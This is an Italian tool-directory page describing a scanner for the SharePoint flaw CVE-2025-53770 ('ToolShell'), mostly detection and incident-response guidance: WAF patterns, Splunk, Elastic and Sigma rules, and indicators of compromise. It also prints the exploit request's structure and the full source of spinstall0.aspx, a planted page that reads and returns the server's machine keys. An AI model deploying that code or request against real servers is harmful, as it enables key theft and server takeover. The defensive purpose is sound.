Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-53770-Scanner — ToolShell scanner - CVE-2025-53770 e informazioni di rilevamento | Kitploit
Strumenti/GitHubGitHub/zephrfish/cve-2025-53770-scanner
Strumenti DifensiviGestione degli Indicatori di Compromissione (IOC)Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingThreat IntelligenceRisposta agli IncidentiAnalisi dei Log
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell scanner - CVE-2025-53770 e informazioni di rilevamento

18551 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
Condividi

Scanner di Vulnerabilità SharePoint CVE-2025-53770

100% assemblato con tutti i tweet che circolano con payload e diversi attacchi, quindi viene fornito senza garanzia ecc. Lo scanner è progettato per identificare istanze vulnerabili e ha una configurazione con usi noti di sfruttamento in circolazione; è principalmente progettato per uso difensivo per identificare istanze vulnerabili e consentire di applicare patch.

Questo scanner esegue controlli automatizzati delle distribuzioni SharePoint:

  • Inviando richieste POST appositamente create agli endpoint ToolPane di SharePoint con payload di exploit
  • Rilevando tentativi di estrazione della chiave macchina e sfruttamento riuscito
  • Identificando il deployment di payload secondario (spinstall0.aspx)
  • Analizzando le risposte per indicatori di vulnerabilità basati su pattern di attacco osservati
  • Fornendo report dettagliati con livelli di confidenza e avvisi di azione immediata
  • Supportando la scansione concorrente per efficienza

Capacità di Rilevamento Chiave

CRITICO: Rilevamento Estrazione Chiave Macchina

  • Rileva risposte di estrazione chiave macchina riuscite
  • Identifica l'esposizione di ValidationKey, DecryptionKey e CompatibilityMode
  • Riconosce pattern di chiave macchina delimitati da pipe (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Attiva avvisi di azione immediata per sistemi compromessi

Rilevamento Payload Secondario

  • Identifica tentativi di deployment di spinstall0.aspx
  • Rileva pattern di codice payload C# ASP.NET
  • Riconosce l'uso di System.Web.Configuration.MachineKeySection
  • Rilevamento percorso specifico per versione (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Installazione

  1. Clona il repository:
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Installa le dipendenze:
root@kitploit:~
pip install -r requirements.txt

Utilizzo

Utilizzo Base

Crea un file di testo con gli host target (uno per riga):

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Esegui lo scanner:

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Opzioni da Riga di Comando

OpzioneDescrizionePredefinito
-i, --inputPercorso del file con lista host (obbligatorio)-
-o, --outputFile di output per i risultati (.json, .csv, .txt)Nessuno
-l, --logfilePercorso del file di log per logging dettagliatoNessuno
-t, --threadsNumero di thread concorrenti10
-v, --verboseAbilita output verbose e loggingFalso

Formati di Output

Output JSON (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

Output CSV (-o results.csv)

Fornisce dati tabellari adatti per analisi in fogli di calcolo con colonne per tutte le metriche di scansione.

Output Testo (-o results.txt)

Formato leggibile con stato della vulnerabilità e dettagli della scansione.

Dettagli della Vulnerabilità

CVE-2025-53770 mira a una vulnerabilità di deserializzazione nel componente ExcelDataSet di SharePoint che è stata attivamente sfruttata in circolazione. Lo scanner rileva:

Pattern di Attacco Identificati

  1. Sfruttamento Iniziale: Richiesta POST a /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx con payload serializzati
  2. Estrazione Chiave Macchina: Lo sfruttamento riuscito restituisce la configurazione della macchina delimitata da pipe:
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Esempio: [128-256 caratteri esadecimali]|HMACSHA256|[48-96 caratteri esadecimali]|AES|Framework45
    
  3. Payload Secondario: Deployment di spinstall0.aspx per accesso persistente ed estrazione chiave
  4. Targeting per Versione: Percorsi diversi per versioni di SharePoint (layouts 15/ vs 16/)

IOC Confermati da Sfruttamento Attivo

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Tipicamente 7699-8000+ byte
  • Dimensione Payload: Grandi parametri CompressedDataTable codificati in base64
  • Indicatori di Risposta: Stringhe chiave macchina, deployment spinstall0.aspx
  • Infrastruttura di Attacco: 65.38.121.198, 162.243.204.189, 165.22.18.129

Logica di Rilevamento

Lo scanner analizza le risposte per:

  1. Pattern di estrazione chiave macchina (confidenza CRITICA)
  2. Indicatori di payload secondario (confidenza ALTA)
  3. Elaborazione componente ExcelDataSet/Scorecard (confidenza MEDIA)
  4. Pattern di errore ToolPane e caratteristiche di risposta anomale (confidenza BASSA)

Considerazioni sulla Sicurezza

  • Questo strumento è progettato solo per test di sicurezza autorizzati
  • Assicurati di avere l'autorizzazione prima di scansionare qualsiasi sistema
  • Lo scanner usa HTTPS per impostazione predefinita ma accetta certificati autofirmati
  • I log possono contenere informazioni sensibili - proteggili adeguatamente
  • Considera l'impatto sulla rete quando si utilizzano thread elevati

Esempio di Sessione di Scansione

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

Risoluzione dei Problemi

Problemi Comuni

  1. Timeout di Connessione: Aumenta il timeout o riduci il numero di thread
  2. Errori SSL: Lo scanner disabilita gli avvisi SSL per impostazione predefinita
  3. Errori di Permesso: Assicurati di avere accesso in scrittura per i file di output/log
  4. Utilizzo Memoria: Monitora con liste host grandi

Analisi dei Log

Abilita logging verbose (-v) e file di log (-l) per una risoluzione dei problemi dettagliata:

root@kitploit:~
tail -f scan.log

Analisi dello Sfruttamento

Payload di Attacco Osservati

Lo scanner incorpora il rilevamento per pattern di sfruttamento confermati osservati in attacchi attivi:

Struttura del Payload Primario

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

Payload Secondario (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Formato di Risposta Chiave Macchina Previsto

root@kitploit:~
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Guida al Rilevamento e Monitoraggio

Rilevamento dei Tentativi di Sfruttamento CVE-2025-53770

Le organizzazioni dovrebbero implementare i seguenti meccanismi di rilevamento per identificare potenziali tentativi di sfruttamento:

1. Regole del Firewall per Applicazioni Web (WAF)

Monitora richieste POST sospette verso endpoint ToolPane di SharePoint:

root@kitploit:~
# Example WAF detection rule patterns
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

pattern di sfruttamento osservati:

  • Dimensioni payload tipicamente 7000-8000+ byte
  • Dati compressi codificati in URL nel parametro CompressedDataTable
  • Stringa User-Agent specifica: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Header Connection: close spesso presente
  • Oggetti .NET serializzati codificati in base64 nel payload
  • Risposta contiene chiavi macchina in formato delimitato da pipe
  • Richieste secondarie ai file spinstall0.aspx distribuiti

2. Log ULS di SharePoint

Monitora i log del SharePoint Unified Logging Service (ULS) per:

root@kitploit:~
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

Indicatori chiave nei log ULS:

  • Eccezioni impreviste nell'elaborazione di ToolPane.aspx
  • Errori di deserializzazione nei componenti Microsoft.PerformancePoint
  • Corruzione della memoria o crash del processo in w3wp.exe

3. Log di Accesso IIS

Monitora i log IIS per pattern di sfruttamento:

root@kitploit:~
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

IOC specifici da attacchi reali:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Analisi del Traffico di Rete

Monitora il traffico di rete per:

  • Dimensioni anomale delle richieste POST verso server SharePoint
  • Richieste ripetute a ToolPane.aspx da singole sorgenti
  • Payload codificati in base64 nei corpi delle richieste HTTP POST
  • Stringhe User-Agent non browser che puntano a SharePoint

5. Log degli Eventi di Windows

Monitora i log degli eventi di Windows sui server SharePoint:

root@kitploit:~
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. Regole di Rilevamento SIEM

Query di Rilevamento Splunk:
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Rilevamento Migliorato per Attacchi Reali:
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Query Elastic/Kibana:
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Regola Sigma per CVE-2025-53770:
root@kitploit:~
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Indicatori Comportamentali

Osserva questi comportamenti post-sfruttamento:

  • Connessioni di rete in uscita anomale dai server SharePoint
  • Nuovi account utente creati in SharePoint o Active Directory
  • Caricamenti o modifiche di file non autorizzati
  • Tentativi di escalation dei privilegi
  • Movimento laterale verso altri sistemi

Azioni di Risposta Raccomandate

  1. Risposta Immediata:

    • Blocca gli IP di origine sospetti al firewall/WAF
    • Isola i server SharePoint interessati se lo sfruttamento è confermato
    • Conserva log e dump di memoria per analisi forensi
  2. Indagine:

    • Analizza i payload delle richieste POST per contenuti malevoli
    • Verifica gli indicatori di esecuzione di codice riuscita
    • Revisiona le attività degli account utente e le modifiche alle autorizzazioni
    • Correlazione con altri eventi di sicurezza
  3. Contenimento:

    • Applica le patch di sicurezza immediatamente
    • Implementa regole WAF per bloccare i tentativi di sfruttamento
    • Segmenta i server SharePoint dalle risorse di rete critiche

Esempi di Integrazione SIEM

Importazione dei Risultati di Scansione in Splunk:

root@kitploit:~
# Convert scan results for Splunk ingestion
python3 scanner.py -i hosts.txt -o results.json
# Import into Splunk index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
Scarica lo strumento